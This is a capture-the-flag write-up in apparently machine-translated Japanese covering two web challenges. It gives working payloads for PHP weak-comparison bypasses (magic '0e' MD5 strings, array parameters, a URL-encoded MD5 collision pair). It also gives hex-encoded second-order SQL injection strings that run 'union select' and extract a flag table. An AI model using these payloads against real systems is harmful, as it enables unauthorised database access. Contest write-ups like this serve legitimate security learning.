第2回強ネットカップWriteup

Web署名
param 1,param 2の2つのパラメータを提出して,全部で3つの関門,phpの弱いタイプを考察して,極客の大きい挑戦のテーマと同じです
第一関門:
標準の弱いタイプで、0 eの先頭md 5を2つ迂回します.

param1=QNKCDZO&param2=240610708

あるいは配列が迂回する

param1[]=a&param2[]=b

第2の関門:依然として配列が迂回している:

param1[]=a&param2[]=b

第3の関門:強制的に文字列に変換して、配列で迂回することができなくて、md 5の衝突を考えて、つまり2つの異なる文字列のmd 5の値は同じです

param1=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C%2F%CA%B5%87%12F%7E%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25qAZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BD%F2%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E2%B4%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW%7E%E8%CET%B6p%80%A8%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%2Bo%F7%2Ap
param2=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C%2F%CA%B5%07%12F%7E%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25%F1AZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BDr%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E24%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW%7E%E8%CET%B6p%80%28%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%ABo%F7%2Ap

具体的には、MD 5 collisionバイナリブロックを文字列に変換してurl符号化する
Three hit
にじちゅうにゅう
登録はユーザー名、パスワード、年齢をデータベースに書き込んで、登録した後に年齢を表示する構想:毎回1人のユーザーを登録して、注入点はageに入れて、登録して見ます
登録コミットageは数字のみで表示され、ageは16進数でコミットされ、16進数コミットは%23 urlを復号しないので、-の代わりに使用されます.
payload: username=Str3am1&age=0x2d3636363636363636363636363636363636363636363636363620756e696f6e2073656c65637420312c322c332c34206c696d697420312c312d2d&password=1
年齢は毎回データベースに書き込まれるので、毎回年齢の値username=Str3am11&age=0x2d36363636363636363636363636363636363636363636363620756e696f6e2073656c65637420312c2873656c65637420666c61672066726f6d20666c6167292c332c34206c696d697420312c312d2d&password=1を変更する必要があります.
まとめ
2日間の試合で、チームの総成績は136名で、試合の過程はとても苦労して、しかし収穫はとても豊富で、残念なことに2つの問題しかできなくて、やはり料理が多すぎて、後で試合後にwpを書くことを堅持して、自分に対しても1種の鍛錬です.